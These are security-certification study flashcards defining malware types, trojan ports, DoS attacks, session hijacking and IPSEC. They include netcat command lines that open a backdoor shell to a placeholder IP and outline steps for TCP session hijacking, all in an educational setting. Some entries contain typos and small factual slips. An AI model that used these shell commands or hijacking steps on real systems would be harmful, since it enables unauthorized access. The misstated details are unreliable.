Trojans and other Attacks Flashcards
Malware
Software designed to harm or secretly access a computer system without the owner’s informed consent. Computer contaminant
Malvertising
Embedding malware into ad networks
Malware Delivery
Downloaded from the Internet
Drive by downloading
Hijacking of peer to peer applications
Email attachment
Overt Channels
Legitimate communication channels
Covert Channels
Used to transport data in unintended ways
Wrappers
Programs that allow you to bind a trojan to an innocent file
Crypters
Software tools that use a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products, Fud-fully undetectable
Packers
Use compression to pack the malware executable harder to detect for antivirus engines. Extraction occurs in memory and not on desk.
Trojan Exploit Kits
Infinity
Bleeding Life
Crimepack
Blackhole Exploit Kit
Trojan
Embedded malicious code in an otherwise normal application
Types of Trojans
Defacement trojan
Proxy server trojan
Botnet trojan (tor based Chewbacca and Skynet)
Remote Access trojan (RAT, MoSucker, Optix Pro, Blackhole)
Ebanking trojan (Zeus, Spyeye)
Covert Channel Tunneling Trojan (CCTT)
A form of remote access trojan that uses a variety of exploitation techniques to create data transfer channels in previously authorized data streams. Designed to provide an external shell from within the internal environment.
Command shell trojan
Provides a backdoor to the system that you connect to via command-line access. Netcat, example: nc -e IPaddress port#
-t option will provide telnet
Example: nc -l -p 5555 opens a port in a listening state and nc IPaddress -p 5555 connects to the target machine with a telnet like connection
Netcat can be used for outbound or inbound connections over TCP or UDP, to or from any port on the machine. It offers DNS forwarding, port mapping and forwarding and proxying. It can also be used as a port scanner.
Trojan Ports
Death 2 Senna Spy 20 Hackers Paradise 31,456 TCP Wrappers 421 Doom,Satanz Backdoor 666 Silencer,WebEx 1001 RAT 1095-98 SubSeven 1243 Shivka-Burka 1600 Trojan Cow 2001 Deep Throat 6670-71 Tini 7777 Netbus 12345,12346 Whack a Mole 12361-12363 Back Orifice 31337,313338 Use netstat -an to monitor listening ports netstat -b - displays all active connections and the processes using them
Neverquest Trojan
Targets banking websites. designed to steal credentials and sensitive information and to set up VNC remote access targets
Port monitoring tools
Fport - shows same info as netstat -an but also maps them to running processes and PIDs Whats Running TCPView IceSword CurrPorts Process Explorer
Registry monitoring tools
SysAnalyzer, Tiny Watcher, Active Registry Monitor, Regshot, Malwarebytes
Service monitoring
Windows Service Manager
Service Manager Plus
Smart Utility
Verifying the integrity of system files - can act as a HIDS for trojans
Tripwire
Sigverif - creates c:\windows\system32\sigverif.txt
Virus
self-replicating program that reproduces its code by attaching copies into other executable codes
Can be distributed through virus hoaxes and fake antivirus programs
Ransomware
Malicious software designed to deny access to a computer until a ransom is paid
Wannacry
Ransomware that took advantage of an unpatched SMBv1 exploit known as Eternal Blue
Ransomware programs
Cryptorbit
Cryptolocker
CryptoDefense
Boot sector virus
Also known as a system virus, this virus type actually moves the boot sector to another location on the hard drive, forcing the virus code to be executed first
Petya ransomware overwrote the master boot record
Shell virus
Wraps itself around an application’s code, inserting its own code before the application’s
Cluster virus
Modified directory table entries so that user or system processes are pointed to the virus code itself instead of the application
Multipartite virus
Attempts to infect both files and the boot sector at the same time and refers to a virus with multiple infection vectors.
Macro virus
Usually written with Visual Basic for Applications (VBA), infects template files created by Microsoft Office apps. Melissa virus was a macro virus
Polymorphic code virus
Mutates its code using a built in polymorphic engine. Difficult to find and remove because its signature constantly changes.
Encryption virus
Uses encryption to hide the code from antivirus scanners
Metamorphic virus
Rewrites itself every time it infects a new file
Stealth virus
Also known as tunneling virus that evades AV by intercepting the AV’s requests to the operating system and alters the response to AV as uninfected
Cavity virus
Overwrite portions of host files using the null content sections so as not to increase the actual size of the file
Sparse infector virus
Infects only occasionally for example only every tenth time an application is run
File extension virus
Changes the file extensions of files to take advantage that file extensions are hidden by default. readme.txt.vbs looks like readme.txt when file extensions are not being shown
Create your own virus
Sonic Bat,
PoisonVirus Maker,
Sam’s Virus generator,
JPS Virus Maker
Worm
Self replicating malware computer program that uses a network to send copies to other systems. Normally it doesn’t alter files, but it resides in memory and duplicates itself eating up resources.
Confiker worm
Disabled services, denied access to administrator shared drives, locked users out of directories, and restricted access to security-related sites.
Ghost eye worm
Hacking tool that uses random messaging on Facebook and other sites to perform a host of malicious efforts
Code red word
Exploited indexing software on IIS servers in 2001. Used a buffer overflow and defaced thousands of servers
Darlloz
Worm for IOT. Linux based worm that targets running ARM, MIPS and PowerPC architectures, normally routers, set-top boxes and security cameras
Nimda
Modified and touched nearly all web content on a machine. Was the most widespread worm in history. Nimda spread through email, open network shares, and websites and took advantage of backdoors left on machines infected by the Code Red worms.
Slammer
SQL slammer was a denial of service worm attacking buffer overflow weaknesses in Microsoft SQL. ALso called Saphire, SQL_HEL, and Helkern, spread quickly using UDP and its small size (fit inside a single packet)
Bug Bear
Propagated over open network shares and email. Terminated AV applications and set up a backdoor for later use. Also a keylogger
Pretty Park
Spread via email and took advantage of IRC to propagate stolen passwords. Often displayed a 3D Pipe screensaver.
Analyzing malware
Use a virtual machine with the NIC in host only mode and open shares. Analyze the malware statically using tools like binText and UPX to examine the binary itself as well as the compression and packaging techniques. Then execute the malware and check the processes in place (with Process Monitor and Process Explorer). Review network traffic using NetResident, TCPview, or wireshark. Tools for malware analysis include IDA Pro, virustotal, anubis, and threat analyzer.
Sheepdip System
A standalone computer that is set up to check physical media, device drivers, and other files for malware before it is introduced to a network. Normally configured with a couple of different AV programs, port monitors, registry monitors, and file integrity verifiers.
Netizen
Cybercitizen, a person actively involved in online communities
Technorati
blog search engine
Distributed Denial of Service (DDoS) attack
DOS from many systems normally part of a botnet
Botnet
A network of zombies computers the hacker can use to start a distributed denial of service attack
Botnet software
Shark, Poison Ivy. Preferred communication channel used to signal the bots is Internet Relay Chat (IRC) ir Internet Chat Query (ICQ), Could also be http or https
Categories of DOS/DDOS
- Fragmentation attacks - takes advantage of the system’s ability to reconstruct fragmented packets
- Volumetric attacks - also known as a bandwidth attacks, these consume all available bandwidth for the system or service
- Application attacks - consume the resources necessary for the application to run
TCP state exhaustion attacks
Goes after load balancers, firewalls, and applications servers by attempting to consume their connection state tables
SYN attack
Sending thousands of SYN packets to the victim with a false source IP address. Eventually all the resources are consumed
SYN flood
Sending thousands of SYN packets to the victim but does not respond to the SYN/ACK. Also consumes all resources on the victim that has to leave the connection open waiting for a response that never arrives.
ICMP flood
Sending thousands of ICMP echo packets to the target with a false source IP address.
Smurf
Sending thousands of ping requests to a subnet broadcast address with the source IP of the target. Fraggle attack is similar but uses UDP
Ping of Death
The attacker fragments an ICMP message to a target. When the fragments are reassembled, the resultant ICMP packet is larger than the maximum size and crashes the system.
Teardrop
A large number of garbled IP fragments with overlapping, oversized payloads are sent to the target machine. On older Microsoft OS this would cause a crash.
Peer to peer
Clients of a peer to peer hub are disconnected and directed to connect to a target system
Pemanent
Phlashing causes permanent damage to a system normally by overwriting firmware. Also known as bricking a system,
LAND attack
Will send a SYN packet to the target with the source IP spoofed to the same IP of the target. The target will loop endlessly and crash the OS.
DOS/DDOS tools
Low Orbit Ion Cannon (LOIC) - can flood a target with TCP, UDP, or HTTP requests
Trinity - linux based
Tribe Flood Network - uses a botnet
R-U-Dead-Yet (RUDY) - performs DOS with HTTP post via a long form field
Slowloris - TCP DOS tool that ties up open sockets and causes services to hang. Useful against web servers
DOS/DDOS countermeasures
Disabling unnecessary services Good firewall policy Patching Use a good NIDS Skydance - can detect a DOS Network ingress filtering and auditing
Session Hijacking
Refers to stealing an active TCP session from a client. The server is not aware and the client reconnects using a different session.
- Sniff the traffic between the client and the server
- Monitor the traffic and predict the sequence numbering
- Desynchronize the session with the client by sending a TCP RST, or FIN.
- Predict the session token
- Take over the session by pretending to be the client to the server. Inject packets to the target server
Session hijacking can be done via brute force, calculation or stealing.
Sequence numbers increment on acknowledgment, An acknowledgment of 105 with a windows size of 200 means you could expect sequence numbering from 105 through 305
Session hijacking tools
Ettercap Hunt - can sniff, hijack and reset connections T-sight Zaproxy Paros - also a proxy Burp Suite Juggernaut Hamster Ferret
Man in the browser
When an attacker sends a trojan to intercept browser calls, sitting between the browser and the libraries, allowing a hacker to watch and interact within a browser session.
Session hijacking countermeasures
Use unpredictable session IDs
Limit incoming connections
Minimize remote access
Regenerate the session key after authentication is complete
Use encryption to protect the channel (IPSEC is an option)
IPSEC
Secures traffic by providing encryption and authentication services to each packet. Works in one of two modes:
- Transport mode - payload and ESP trailer are encrypted but the original IP header is not. Can be used in a NAT network
- Tunnel mode - the whole packet including the original IP header is encrypted making it incompatible with NAT
IPSEC Authentication Header (AH)
Guarantees the integrity and authentication of the IP packet sender
IPSEC Encapsulating Security Payload (ESP)
Provides origin authenticity and integrity and can also encrypt. ESP does not provide integrity and authentication for the entire IP packet in transport mode, but in tunnel mode protection is provided to the entire IP packet
Internet Key Exchange (IKE)
IKE produces the encryption keys
Oakley
Uses Diffie-Hellman to create master and session keys
Internet Security Association Key Management Protocol (ISAKMP)
Facilitates encryption between two endpoints
Spectre and Meltdown
Attacks that took advantage of speculative processing
